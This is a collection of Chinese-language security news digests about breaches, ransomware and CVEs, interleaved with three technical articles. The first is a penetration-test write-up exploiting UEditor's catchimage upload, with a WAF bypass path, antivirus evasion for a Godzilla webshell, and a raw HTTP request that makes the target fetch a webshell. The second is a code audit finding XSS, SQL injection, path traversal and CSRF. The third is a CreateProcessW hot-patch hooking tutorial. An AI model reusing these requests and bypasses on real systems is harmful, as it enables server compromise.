1、安卓版Chrome浏览器测试新的身份信息验证功能 https://source.android.com/docs/security/features/identity-credentials 谷歌正在为Android版的Chrome浏览器测试一项名为“数字凭证 API”的新功能，该功能允许网站安全地请求存储在移动钱包中的身份信息。根据Google的官方文档，Identity Credential API提供了一个接口，可以访问一个安全存储区，该存储区存储着现实世界的身份证明文件，包括可以是护照、驾驶执照、或者用户上传的任何其他身份证明文件。目前尚不清楚该功能何时可正式推出，谷歌仍在试验该想法。 2、Fortra FileCatalyst工作流应用存在严重SQL注入漏洞 https://www.fortra.com/security/advisory/fi-2024-008 工作流传输应用Fortra FileCatalyst Workflow存在严重的安全漏洞，该漏洞允许攻击者通过工作流Web应用程序的各个URL端点中的JOBID参数执行SQLi，修改包括创建管理用户以及删除或修改应用程序数据库中的数据。该漏洞编号为CVE-2024-5276，CVSS评分为9.8，它影响FileCatalyst Workflow版本5.1.6 Build135及更早版本。该漏洞已在版本5.1.6 build139中得到解决。 3、CISA警告大多数开源项目未使用内存安全代码 https://www.cisa.gov/sites/default/files/2024-06/joint-guidance-exploring-memory-safety-in-critical-open-source-projects-508c.pdf 美国网络安全和基础设施安全局(CISA)澳大利亚(ASD、ACSC)和加拿大组织(CCCS)共同签署了一项研究报告，调查了172个知名的开源项目是否容易受到内存安全缺陷的影响。内存安全语言是旨在防止常见内存相关错误（例如缓冲区溢出、释放后使用和其他类型的内存损坏）的编程语言。相关研究项目是对2023年12月发布的“内存安全路线图案例”的 4、新型信用卡网络盗刷器针对多款内容管理系统目标 https://blog.sucuri.net/2024/06/caesar-cipher-skimmer.html 研究人员发现名为Caesar Cipher Skimmer的新型信用卡网络盗刷器已将WordPress、Magento和OpenCart等多个内容管理系统(CMS)平台作为攻击目标，信用卡网络盗刷器是指注入电子商务网站以窃取财务和支付信息的恶意软件。攻击者对包括与WordPress的WooCommerce插件相关的结帐PHP文件（“form-checkout.php”）进行恶意修改，以窃取信用卡详细信息。 5、TeamViewer检测到内部IT环境疑似遭到入侵 https://thehackernews.com/2024/06/teamviewer-detects-security-breach-in.html TeamViewer公司在一份声明中表示在2024年6月26日检测到其内部IT环境在“异常”，并立即启动了响应团队和响应程序。该公司进一步指出，其企业IT环境与产品环境完全隔绝，没有证据表明任何客户数据因该事件受到影响，目前正与全球知名的网络安全专家团队一起展开调查，并实施了必要的补救措施。TeamViewer公司没有透露此次入侵背后的黑手和如何实施的细节，但表示正在进行调查，并将在获得新信息时及时更新。 6、BlackSuit勒索组织声称对KADOKAWA发动攻击 https://tp.kadokawa.co.jp/.assets/240627_release_en_wD9vY5XU.pdf BlackSuit勒索软件团伙声称最近对KADOKAWA公司发动了网络攻击，KADOKAWA是一家日本媒体集团，旗下经营着多家电影、出版和游戏行业的公司。KADOKAWA公司报告称由于6月8日遭受的网络攻击，集团的多个网站目前正在经历服务中断，该事件影响了该公司及其子公司的大部分业务，因为它们托管在同一个数据中心，这些数据中心被勒索软件加密。BlackSuit勒索软件团伙威胁说如果不支付赎金，他们将公布被盗数据。 7、GitLab严重漏洞允许以任何用户权限运行管道 https://about.gitlab.com/releases/2024/06/26/patch-release-gitlab-17-1-1-released/#run-pipelines-as-any-user 影响GitLab社区版和企业版产品的某些版本存在的严重漏洞可被攻击者利用以任何用户的身份运行管道功能。GitLab是一款流行的基于Web的开源软件项目管理和工作跟踪平台，据估计拥有100万活跃的许可用户。安全漏洞编号为CVE-2024-5655，严重程度评分为9.6（满分10分），GitLab管道是持续集成/持续部署(CI/CD)系统的一项功能，用户能够自动并行或按顺序运行流程 8、Kimsuky组织使用恶意Chrome扩展窃取数据 https://www.zscaler.com/blogs/security-research/kimsuky-deploys-translatext-target-south-korean-academia APT组织Kimsuky使用名为TRANSLATEXT的新恶意Google Chrome扩展程序窃取敏感信息进行情报收集工作。TRANSLATEXT扩展程序伪装成Google翻译，它整合了JavaScript代码以绕过Google、Kakao和Naver等服务的安全措施，窃取电子邮件地址、用户名、密码、cookie，还可以从Blogger Blogspot URL获取命令，以便截取新打 9、SnailLoad侧信道攻击利用延迟推断用户网络活动 https://snailload.com/ 研究人员发现了一种名为SnailLoad的新型侧信道攻击，可用于远程推断用户的网络活动。这一安全问题存在于所有的互联网连接中，通过利用网络数据包的延迟，攻击者能够推断其他人互联网连接上的当前网络活动，包括使用此信息推断用户访问的网站或用户观看的视频。该攻击方法的一个显著特点是，它无需进行中间人(AitM)攻击或在物理上接Wi-Fi 连接来嗅探网络流量，而是诱骗目标从威胁行为体控制的服务器加载无害资产（例如文件、图像或广告），然后利用受害者的网络延迟作为侧信道来确定受害者系统上的网络活动。研究人员表示，OpenWrt社区以及360、华为、Links 10、Google浏览器将于11月起屏蔽Entrust证书 https://security.googleblog.com/2024/06/sustaining-digital-certificate-security.html 谷歌宣布，将从2024年11月1日左右开始在其Chrome浏览器127版及更高版本开始屏蔽使用Entrust证书的网站，理由是这些网站不符合合规性，且该证书颁发机构无法及时解决安全问题。过去几年中，公开披露的事件报告突显了Entrust的一系列令人担忧的行为，这些行为未能达到安全预期，并且削弱了人们对其作为公众信任的证书颁发机构所有者的能力、可靠性和诚信的信心。预计屏蔽措施将涵盖Windows、macOS、ChromeOS、 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 最近参与某次攻防演练，通过前期信息收集，发现某靶标单位存在某域名备案。 通过fofa搜索子域名站点，发现存在一个子域名的61000端口开放着一个后台，于是开始进行渗透。 目录扫描 进行目录扫描吗，发现/bin.rar路径可以访问到一个压缩文件。 使用下载器下载到电脑，打开压缩包，猜测内容为站点源代码，代码为.net形式，使用c#语言编写。 C#代码经过编译后为dll文件形式，根据dll文件命名规则和.net类型代码格式。我们可以初步判定xxx.Application.Web.dll文件中存在主要的后端逻辑代码。 但是dll为二进制文件我们无法直接查看，因此需要使用dnspy进行反编译查看。 查看方法：将dll文件丢入dnspy即可。 UEditor的曲折利用 在源码中发现该系统使用UEditor。 可得UEditor的路径/Utility/UEditor/controller.ashx 访问关键接口/Utility/UEditor/?action=catchimage和/Utility/UEditor/?action=config 然而服务器返回403无法访问。 通过Fuzz发现403的原因是有可能是因为waf或者edr的拦截。 使用/Utility/UEditor/.css?action=catchimage可进行bypass，成功访问关键接口。 接下来就是参考UEditor .net版本的任意文件上传漏洞进行上传哥斯拉jsp webshell。 漏洞利用参考链接： https://www.freebuf.com/vuls/181814.html上传过程中发现普通哥斯拉jsp webshell上传后就被杀软拦截无法访问。 于是用https://github.com/Tas9er/ByPassGodzilla项目对webshell进行免杀处理。 方可成功上传webshell并进行连接，至此该UEditor站点利用完成，后面就是愉快的打内网。 UEditor的简便利用 传统的UEditor利用都是本地编写一个html文件中包含一个表单，通过提交表单使目标服务器根据提交的图片马地址下载webshell。 <form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">  <p>shell addr:<input type="text" name="source[]" /></p >  <inputtype="submit" value="Submit" /> </form> 原理还是通过http请求发送图片马地址，所以直接在burpsuite发包也可以达到相同的效果，省去制作html文件的步骤。 POST /替换漏洞URL地址拼接/UEditor/controller.ashx?action=catchimage HTTP/1.1 Host: x.x.x.x Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded source[]=http://替换为自己服务器开启http服务的URL地址/666.jpg?.aspx 请求发送后，返回包返回webshell路径。 总结 UEditor作为热门常见漏洞，在大型企业集团中的.net老旧系统中非常常见，相关的利用方法以及绕过方法需要非常熟练，方可快人一步迅速拿下权限； 在渗透测试过程中，我们可能会遇到一些与实验环境或他人分享的情况不同的挑战。这时，我们需要具备排查问题原因的能力。例如，在利用漏洞的过程中,可能会遇到无法上传webshell或请求被WAF拦截等情况。我们需要根据场景，修改payload或使用fuzz等技术进行绕过，直到成功利用漏洞并获取所需的权限，完成渗透。大战UEditor并突破。

1、T-Mobile称泄露数据源自于其第三方供应商 https://www.bleepingcomputer.com/news/security/t-mobile-denies-it-was-hacked-links-leaked-data-to-vendor-breach/名为IntelBroker的攻击组织声称已窃取并正在出售德国电信公司T-Mobile的数据，并在黑客论坛上发布了几个截图显示攻击者能够以管理权限访问Confluence服务器和公司内部供开发人员使用的Slack频道，威胁行为体将他们出售的数据内容描述为“源代码、SQL 文件、图像、Terraform数据、t-mobile.com认证、Siloprograms”。T-Mobi 2、FBI警告伪装成律师事务所咨询服务的加密货币骗局 https://www.ic3.gov/Media/Y2024/PSA240624联邦调查局警告称网络犯罪分子冒充律师事务所和律师向投资诈骗的受害者提供加密货币追回服务，意图窃取资金和个人信息。诈骗者声称与美国联邦调查局、消费者金融保护局（CFPB）等政府机构有合作欺骗受害者信任，诈骗分子常见的谎言包括：要求受害者提供个人或银行信息以取回他们的钱。要求受害者预先支付部分费用，并在收回资金时支付余额。指示受害者补缴税款和其他费用以收回他们的资金。 3、安卓版Chrome浏览器测试新的身份信息验证功能 https://source.android.com/docs/security/features/identity-credentials谷歌正在为Android版的Chrome浏览器测试一项名为“数字凭证 API”的新功能，该功能允许网站安全地请求存储在移动钱包中的身份信息。根据Google的官方文档，Identity Credential API提供了一个接口，可以访问一个安全存储区，该存储区存储着现实世界的身份证明文件，包括可以是护照、驾驶执照、或者用户上传的任何其他身份证明文件。目前尚不清楚该功能何时可正式推出，谷歌仍在试验该想法。 4、Fortra FileCatalyst工作流应用存在严重SQL注入漏洞 https://www.fortra.com/security/advisory/fi-2024-008工作流传输应用Fortra FileCatalyst Workflow存在严重的安全漏洞，该漏洞允许攻击者通过工作流Web应用程序的各个URL端点中的JOBID参数执行SQLi，修改包括创建管理用户以及删除或修改应用程序数据库中的数据。该漏洞编号为CVE-2024-5276，CVSS评分为9.8，它影响FileCatalyst Workflow版本5.1.6 Build135及更早版本。该漏洞已在版本5.1.6 build139中得到解决。 5、苹果修复AirPods产品中可能导致窃听的蓝牙漏洞 https://support.apple.com/en-us/106340Apple发布AirPods的固件更新修补可能会允许恶意行为体以未经授权的方式访问耳机的安全漏洞，该安全问题编号为CVE-2024-27867，影响AirPods（第二代及更新版本）、AirPods Pro（所有型号）、AirPods Max、Powerbeats Pro和Beats Fit Pro等产品。当你的耳机正在向之前配对的设备之一发出连接请求时，蓝牙范围内的攻击者可能会伪造预期的源设备并获取你耳机的访问权限。换句话说，物理距离较近的对手可以利用此漏洞窃听私人谈话。 6、GitLab安全更新补丁修复了14个漏洞 https://www.securityweek.com/gitlab-security-updates-patch-14-vulnerabilities/GitLab 周三宣布了针对 GitLab 社区版（CE）和企业版（EE）的安全补丁，修复了 14 个漏洞，包括一个严重漏洞和三个高严重漏洞。 7、Vanna AI 中的提示注入漏洞导致数据库遭受RCE攻击 https://thehackernews.com/2024/06/prompt-injection-flaw-in-vanna-ai.html网络安全研究人员披露了 Vanna.AI 库中的一个高严重性安全漏洞，该漏洞可被利用通过提示注入技术实现远程代码执行漏洞。 8、南非国家卫生实验室遭遇勒索软件攻击 https://therecord.media/south-africa-lab-ransomware-mpox-outbreakNHLS 在南非各地运营着 265 个实验室，为南非九个省的公共医疗机构提供检测服务。发言人拒绝透露此次事件的幕后黑手是哪个勒索软件组织，也拒绝透露是否需要支付赎金。 9、P2PInfect僵尸网络向受控节点分发勒索软件模块 https://www.cadosecurity.com/blog/from-dormant-to-dangerous-p2pinfect-evolves-to-deploy-new-ransomware-and-cryptominer原本潜伏的、动机不明的点对点恶意软件僵尸网络P2PInfect最近开始变得活跃起来，在对Redis服务器的攻击中部署了勒索软件模块和加密矿工，研究人员声称有证据表明该恶意软件以“雇佣僵尸网络”的形式运行。从2024年5月16日开始，感染P2PInfect的设备开始收到从指定URL下载并运行勒索软件负载(rsagen)的指令，该命令有效期至2024年12月17日， 10、影响 Linux内核的UAF零日漏洞在暗网出售，售价15万美元 https://www.freebuf.com/news/404615.html一个恶意行为者在著名的暗网论坛 BreachForum 上宣布出售影响 Linux 内核的（UAF）零日漏洞。该漏洞允许低权限用户执行高权限代码，对受影响系统构成严重威胁。漏洞利用者指出该漏洞影响 6.6.15 - amd64 版本的 Linux 内核。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、新型Medusa安卓木马针对欧美7国银行用户 https://www.cleafy.com/cleafy-labs/medusa-reborn-a-new-compact-variant-discovered 研究人员发现一款名为Medusa（又名TangleBot）的针对Android系统的复杂银行木马，该木马的最新版本仅需要轻量级的权限集以逃避检测，具有读取短信、记录按键、截取屏幕截图、记录通话、实时共享设备屏幕、执行未经授权的资金转账、窃取银行凭证等功能。自2024年5月被发现以来，Medusa木马已用于攻击加拿大、法国、意大利、西班牙、土耳其、英国和美国的银行用户。 2、Polyfill供应链劫持攻击影响超11万个网站 https://sansec.io/research/polyfill-supply-chain-attack Polyfill是一个流行的JavaScript库，研究人员近期发现今年2月初，该代码库的官方域名被中国内容交付网络公司Funnull收购，并修改了JavaScript库（“polyfill.js”）的代码内容，导致代码库的用户被重定向到恶意和诈骗网站。已知超过110000个嵌入图书馆和电子商务的站点受到供应链攻击的影响，Polyfill项目的原创者Andrew Betts敦促网站的所有者立即将其删除。 3、Boolka组织通过SQLi攻击部署BMANAGER木马 https://www.group-ib.com/blog/boolka/ 研究人员发现一个之前未被记录的名为Boolka的威胁行为体正在利用Web攻击脚本入侵网站，以传播代号为BMANAGER的模块化木马。该组织至少从2022年开始就一直在对各个国家的网站进行机会性SQL注入攻击，包括用恶意JavaScript脚本感染易受攻击的网站，这些脚本能够拦截在受感染网站上输入的任何数据，来获取凭证和其他个人信息等敏感详细信息。此外，攻击者还会将用户重定向到一个虚假的加载页面，提示受害者下载并安装BMANAGER木马程序。 4、奢侈品零售商Neiman Marcus遭数据泄露攻击 https://www.bleepingcomputer.com/news/security/neiman-marcus-confirms-data-breach-after-snowflake-account-hack/ 奢侈品零售商Neiman Marcus证实，黑客组织正在试图出售最近从该公司Snowflake账户中窃取的数据。在2024年4月至5月期间，未经授权的第三方获得了Neiman Marcus 集团使用的数据库平台的访问权限。根据调查，攻击者获取了存储在数据库平台中的某些个人信息，该公司表示，此次泄露影响了64472用户信息，包括姓名、联系信息、出生日期以及Neiman Ma 5、P2Pinfect 蠕虫正在向 Redis 服务器投放勒索软件 https://www.securityweek.com/p2pinfect-worm-now-dropping-ransomware-on-redis-servers/ Cado Security 报告称，P2Pinfect 是一种针对 Redis 服务器的点对点 (P2P) 蠕虫，最近进行了更新，以部署勒索软件和恶意挖矿。该蠕虫病毒以 Rust 编程语言编写，于 2023 年 7 月首次发现，并传播到受较旧的 Lua 沙箱逃逸漏洞 (CVE-2022-0543，CVSS 评分为 10) 影响的 Redis 服务器。 6、新的MOVEit Transfer漏洞已被威胁行为者织利用 https://www.securityweek.com/exploitation-attempts-target-new-moveit-transfer-vulnerability/ Progress Software 本周公开宣布了针对影响其 MOVEit Transfer 文件传输软件的两个严重身份验证绕过漏洞的补丁，其中一个漏洞已被发现遭到利用。Progress 于 6 月 25 日发布了单独的公告，告知客户有关CVE-2024-5805和CVE-2024-5806 的信息，这两个漏洞被描述为 MOVEit Transfer 产品的 SFTP 模块中存在的身份验证不当问题。攻击者可利 7、维基解密创始人朱利安·阿桑奇认罪后已获释 https://securityaffairs.com/164916/security/julian-assange-is-free.html 在贝尔马什监狱服刑五年后，维基解密创始人朱利安·阿桑奇终于重获自由，他已从英国获释，在北马里亚纳群岛的塞班岛出庭认罪，承认违反美国《间谍法》后获释，随后飞往澳大利亚，成为自由人。 8、Apple 修复 AirPods蓝牙漏洞，该漏洞可导致被窃听 https://thehackernews.com/2024/06/apple-patches-airpods-bluetooth.html Apple 发布了AirPods 的固件更新，这可能会允许恶意行为者以未经授权的方式访问耳机。该身份验证问题编号为 CVE-2024-27867，影响 AirPods（第二代及更新版本）、AirPods Pro（所有型号）、AirPods Max、Powerbeats Pro 和 Beats Fit Pro。 9、过去3年中有2.8 亿人安装了危险的Chrome扩展程序 https://www.techspot.com/news/103522-researchers-280-million-people-installed-malware-infected-chrome.html 据最新的报告，过去三年时间里，有 2.8 亿人安装了受恶意软件感染的 Chrome 浏览器扩展。但根据谷歌方面的数据，只有不到1%的扩展中存在恶意软件。 10、西门子电力自动化产品存在多个漏洞 https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-in-siemens-power-automation-products-cp-8000-cp-8021-cp8-022-cp-8031-cp-8050-sicore/ 西门子能源自动化产品中发现多个漏洞。信息可能通过未经身份验证的缓冲区覆盖而泄露。此外，通过缺少输入清理，可以实现经过身份验证的特权升级。攻击者能够通过硬件攻击或 shell 访问读取不安全存储的 MQTT 密码。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

本次代码审计使用了白加黑的手法，用黑盒的视角测试功能点，用白盒的方式作为验证。 0x1 XSS guestbook处，可以看到有一个留言板 idea搜索guestbook。发现代码如下，其中的getModel是获取数据的方法。Guestbook.class就是具体要获取的数据。 跟进Guestbook.class查看，发现GuestBook继承自BaseGuestbook 继续跟进BaseGuestbook可以发现http请求的数据，没有发现有过滤函数。 然后使用管理员登录后台查看留言，发现确实如我所想，存在xss漏洞。 ps:审计小技巧，开启sql日志然后一边打payload一边看记事本是否漏掉过滤哪些字符。这里是完全没有过滤，所以在出库的时候如果没有防护，基本上就是实锤xss了。 0x2 SQL注入 在产品中心发现有一个搜索框 看到源码，没有发现有过滤字符，这里采用之前开启的mysql日志，通过日志文件的sql语句判断是否有过滤。 直接输入单引号发现该cms返回500报错，很有可能存在sql注入。 于是使用两个单引号''使得系统不抛出异常，然后查看日志文件中发现sql语句没有过滤单引号，说明注入确实存在。 or 1 结果 or 0结果 注入确实存在 0x3 文件下载 /common/down路由中的file方法，直接获取http请求中的filekey参数，并且没有过滤../等关键字符。fileKey的值和PathKit.getWebRootPath()函数的返回值拼接。然后fileKey其实就是http中的参数。 ps：该路由不在前台，只能通过白盒的方式去进行，但是后续通过github上的fuzz字典发现也可以fuzz得到但是fuzz发包数量巨大不作为参考。但是日后如果实在挖不出洞，可以考虑多fuzz一下，也许就出货了也说不准。这里用的字典较大，其实可以考虑小一些的字典，算是个人的一些挖洞经验吧。 参数的fuzz 0x4 csrf 在系统管理-> 系统用户 -> 添加用户处，抓包然后使用burp生成csrf poc 保存至html后，点击submit request 可以看到用户被成功添加了 0x5 组合拳+sql备份getshell未果（条件较为苛刻） 这里是想getshell来着，毕竟都白盒了，当然能getshell就getshell，不能getshell就想办法getshell了。这里是发现后台上传接口，过滤了jsp，jspx文件名。 发现公司管理->基础内容->公司信息有上传图片 上传jsp文件,jspx文件均被拦截。 然后发现系统管理->数据库管理处发现可以进行数据库备份还原操作。在数据库还原抓包，发现是一个sql文件名字。这里想到之前的任意文件下载，那么岂不是可以通过上传一个sql文件，然后通过备份这个sql文件进行数据库备份getshell。 首先去下载备份好的sql文件，路径在static/back/文件名 然后添加getshell的payload 然后上传该sql文件，注意需要改后缀名为png 然后sql备份处填写上文件名，使用../让系统跨目录读取png图片 然后查看payload上的1.jsp是否成功生成。 访问的时候失败了，无法解析jsp，jspx等文件，但是服务器确实有写入了jsp文件 得到了两个前置条件 需要知道系统的绝对路径 系统下得开启其他能够解析的应用（如另外一个java系统在其他端口上，但是能够解析jsp，就可以通过该cms的漏洞在其他系统上写webshell，也算是一个任意文件写入，做到了"隔山打牛"） 0x6 默认密码 一个比较容易忽略的点，通常admin的默认密码管理员基本都会在部署网站之后马上修改，但是如果类似有几个账户的情况下，管理员可能会忽略掉其他用户的默认密码。这里可以直接看sql文件。在其sql文件下发现有两个默认账号一个是admin，一个是read。 read登录成功 0x7 总结 本次代码审计强化学习了白+黑的方式，更加简单的找出了漏洞，有些地方还欠缺一些思路，比如0x5rce那一块，想着是不是可以写一个class文件达到rce的效果。或者覆盖掉原本的xml文件之类的操作，不允许上传jsp，jspx文件是否可以通过上传war包来进行getshell。总之觉得还有诸多不足，篇幅关系记录到这。

1、BlackSuit勒索团伙攻击CDK Global造成服务中断 https://www.bleepingcomputer.com/news/security/cdk-global-outage-caused-by-blacksuit-ransomware-attack/ 研究人员发现BlackSuit勒索软件团伙是造成CDK Global公司大规模IT服务中断以及北美各地汽车经销店中断的幕后黑手。不愿透露姓名的消息人士声称CDK目前正在与勒索软件团伙谈判，以获得解密器并避免被盗数据泄露。由于CDK Global服务平台目前已关闭，汽车经销商不得不改用纸笔来开展业务。CDK警告相关客户，威胁行为体正在致电冒充CDK代理或附属公司经销商的名义发起攻击，以获取 2、WordPress插件被植入后门创建恶意管理账户 https://www.wordfence.com/blog/2024/06/supply-chain-attack-on-wordpress-org-plugins-leads-to-5-maliciously-compromised-wordpress-plugins/ 研究人员发现多款WordPress插件被植入后门恶意代码，攻击者试图创建一个新的管理用户帐户，然后可以执行任意操作，包括将系统的详细信息发送回攻击者控制的服务器。此外威胁行为体似乎还在网站页脚中注入了恶意JavaScript代码，似乎会在整个网站中实现垃圾邮件SEO攻击功能。攻击者创建的管理员帐户的用户名为“Option 3、Chrome 126 更新修复了高危内存安全漏洞 https://www.securityweek.com/chrome-126-update-patches-memory-safety-bugs/ 谷歌周一宣布了新的 Chrome 安全更新，该更新解决了外部研究人员报告的四个高严重性内存安全漏洞。是影响该流行浏览器的 Dawn 和 Swiftshader 组件的释放后使用漏洞。 4、印度尼西亚国家数据中心遭勒索攻击被索要 800万美元赎金 https://www.securityweek.com/indonesia-says-a-cyberattack-has-compromised-its-data-center-but-it-wont-pay-the-8-million-ransom/ 印度尼西亚当局周一表示，印度尼西亚国家数据中心遭到黑客组织攻击，该组织索要 800 万美元赎金，但政府不会支付。 5、Zyxel NAS 漏洞近期被僵尸网络利用 https://www.securityweek.com/recent-zyxel-nas-vulnerability-exploited-by-botnet/ Shadowserver Foundation 警告称，已停产的 Zyxel NAS 设备中最近披露的严重漏洞已被用于僵尸网络攻击。 6、新的攻击技术利用 Microsoft 管理控制台文件 https://thehackernews.com/2024/06/new-attack-technique-exploits-microsoft.html 威胁行为者正在利用一种新颖的攻击技术，该技术利用特制的管理保存控制台 (MSC) 文件来使用 Microsoft 管理控制台 ( MMC ) 获得完整的代码执行并逃避安全防御。 7、澳大利亚 Ticketek 发生云泄露，约 3000 万人受影响 https://www.darkreading.com/cloud-security/30m-affected-tickettek-australia-cloud-breach Darkreading 网站消息，与最近的 Ticketmaster 入侵事件直接相似的事件中，澳大利亚一家现场活动票务巨头 Ticketek 表示，它是通过第三方云提供商被入侵的，而 ShinyHunters 则是罪魁祸首。 8、Rafel RAT 恶意软件盯上了”过时“安卓手机 https://www.bleepingcomputer.com/news/security/ratel-rat-targets-outdated-android-phones-in-ransomware-attacks/ Rafel RAT 恶意软件的攻击目标主要是政府和军事部门，大多数受害者位于美国、中国和印度尼西亚。其中一些攻击活动是由 APT-C-35（DoNot Team）等知名勒索软件组织发起，伊朗和巴基斯坦疑似为恶意活动的源头。 9、OpenAI宣布停止不支持国家API服务 https://www.secrss.com/articles/67419 6月25日，全球知名的人工智能公司OpenAI宣布，为了维护服务质量和安全性，将采取额外措施来限制来自当前不支持的国家和地区的API流量。 10、Coinstats 称朝鲜黑客入侵了 1,590 个加密钱包 https://www.bleepingcomputer.com/news/cryptocurrency/coinstats-says-north-korean-hackers-breached-1-590-crypto-wallets/ CoinStats 是一款拥有 150 万用户的加密货币投资组合应用程序，它遭遇了重大安全漏洞，影响了 1,590 个加密货币钱包。朝鲜威胁行为者被怀疑是此次攻击的幕后黑手。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 热补丁的钩取方式是为了解决内联钩取在多线程情况下会出错的情况，使用热补丁的钩取可以避免重复读写指令造成问题。 内联钩取潜在问题 正常情况下，在每次跳转到自定义函数时需要将原始的指令（mov edi，edi）写回CreateProcessW函数内，为了后续正确调用CreateProcesW函数，在调用完毕之后，又需要进行挂钩的处理，即将mov指令修改为jmp指令。 但是在多线程的情况下就可能会出现下列问题，在进行mov指令篡改时可能会发生线程的切换，因为篡改指令的操作不是原子操作。那么在线程2时可能调用了CreateProcessW函数时可能跳转指令还没写完成，例如下图的jmp 0x12xx，而不是原本的jmp 0x1234就导致了执行出错。 为了解决此问题采用了热补丁钩取。 热补丁钩取 热补丁是指在不中断系统运行进行应用。即不中断程序运行也能够修改系统库或程序中的执行逻辑。 这里以CreateProcessW为例子 在windbg中使用以下指令在CreateProcessW函数中打下断点 .reload /f bp CreateProcessW 可以看到CreateProcessW函数入口点是mov edi，edi指令，而在该指令上方有一段没用用到的空间，在windbg中使用int 3指令填充了。 而mov edi，edi指令本身没有实际意义，这就是微软在系统库预留的空间，用于打上热补丁。因为这个指令无论被修改成什么都不会影响程序的执行。 接着可以发现这跳指令的长度为2字节，因此可以使用任意的2字节长的指令替换mov edi，edi。 那么这里就需要寻找可以完成跳转的指令，并且仅占用2字节完成对mov指令的替换。 在汇编中存在着短跳转指令可以完成跳转并且仅占用2字节，用以下例子来观察一下短跳转的指令。 int main() {    // 使用标签作为跳转目标    __asm {        jmp short label;   };    // 标签处定义跳转目标 label:    // 这里是跳转目标后的代码    return 0; } 可以看到在跳转到标签label上时，采用的跳转指令机器码是EB开头的，而不是E9，并且指令长度也只有2字节。 那么00是跳转的偏移值，根据该例子分析一下跳转偏移的计算 跳转偏移 = 目标地址 - 当前地址 - 当前指令的长度 00     = 00731005 - 00731003 - 2 可以看到计算偏移的公式与jmp指令一致，只是跳转的指令的长度为5字节，而短跳转的指令长度为2字节，因此jmp指令也被称之为长跳转。 那么怎么配合短跳转进行一个钩取操作，如下图。我们可以借助短跳转使得指令执行到上述填充的区域，然后再使用jmp指令完成钩取的操作。这里需要注意的是空闲区域的空间大小需要大于5个字节，不然无法容纳jmp指令。 最终修改后钩取的效果如下图，在自定义函数中不在需要钩取与脱钩的操作，因为我们修改的指令不会影响正常的CreateProcessW函数执行。那么在既然不存在写操作，那么在多线程中也不会因为条件竞争导致还没写完就切换线程的情况。 那么代码实现部分如下，这里需要注意长跳转的指令0xE9，短跳转的指令为0xEB，这里先把偏移计算好了0xF9，因此写好了，但是这个偏移值不是唯一值，只要找到的地址存在大于5字节的空闲区域都是可以的。紧接着就是修改函数内部的指令，将初始的指令修改为短跳转，然后再空闲区中填充长跳转即可。 ...    //长跳转指令    BYTE pBuf[5] = { 0xE9, 0 };    //短跳转指令 + 偏移值    BYTE pShortJmp[2] = { 0xEB, 0xF9};    //获取模块地址    HMODULE hModule = GetModuleHandleA(szDllName);    //获取函数地址    FARPROC pfnOld = GetProcAddress(hModule, szFuncName);    //选中长跳转指令填充的地址，这里选择恰好能容纳jmp指令的位置    DWORD target = (DWORD)pfnOld - 5;    //计算跳转的偏移    DWORD dwAddress = (DWORD)pfnNew - target - 5;    //修改区域的权限    VirtualProtect((LPVOID)target, 7, PAGE_EXECUTE_READWRITE, &dwOldProtect);    //将偏移填充到指令中    memcpy(&pBuf[1], &dwAddress, 4);    //将长跳转指令填充    memcpy((LPVOID)target, pBuf, 5);    //保存原始的两个字节    memcpy(pOldBytes, pfnOld, 2);    //将短跳转指令填充    memcpy(pfnOld, pShortJmp, 2);    VirtualProtect((LPVOID)target, 7, dwOldProtect, &dwOldProtect); ... 在自定义函数中，只需要直接调用CreatePorcessW + 2的指令就可以完成原始CreateProcessW函数，不再需要挂钩脱钩的处理。 ...    //调用CreateProcessW + 2 BOOL ret = ((LPFN_CreateProcessW)((DWORD)pfnOld + 2))(        applicationName,        lpCommandLine,        lpProcessAttributes,        lpThreadAttributes,        bInheritHandles,        dwCreationFlags,        lpEnvironment,        lpCurrentDirectory,        lpStartupInfo,        lpProcessInformation       ); ... 完整代码： https://github.com/h0pe-ay/HookTechnology/tree/main/Hook-HotPatch总结 优点：避免多线程出错 缺点：不一定有热补丁的条件，就是不一定存在有垃圾指令 如64位程序的CreateProcessW函数的第一条指令是mov r11，rsp，但是后续的指令都需要用到r11寄存器的值，因此该指令不是无用指令。就不能上述热补丁的方法。

1、多个威胁组织利用开源RafelRAT攻击安卓设备 https://research.checkpoint.com/2024/rafel-rat-android-malware-from-espionage-to-ransomware-operations/ 研究人员发现包括DoNot（又名APT-C-35、Brainworm或Origami Elephant）APT组织在内的多个威胁行为体正在使用名为Rafel RAT的开源Android远程管理工具来进行网络攻击。Rafel RAT拥有广泛的功能，例如擦除SD卡、删除通话记录、窃取信息通知，甚至充当勒索软件等，DoNot组织利用Foxit PDF Reader的设计缺陷诱骗用户点击下载恶意 2、恶意广告活动伪装软件应用传播AdsExhaust木马 https://www.esentire.com/blog/adsexhaust-a-newly-discovered-adware-masquerading-oculus-installer 研究人员发现威胁行为体使用搜索引擎优化(SEO)投毒技术在Google搜索结果页面上显示虚假网站，诱导毫无戒心的网站访问者下载包含Windows批处理脚本的ZIP存档，最终安装一个名为AdsExhaust的恶意广告软件，该广告软件能够从受感染的设备中窃取截图，并使用模拟按键与浏览器进行交互，例如自动点击广告或将浏览器重定向到特定的URL，从而为广告软件运营商创造收入。 3、SolarWinds Serv-U高危漏洞正被威胁组织利用 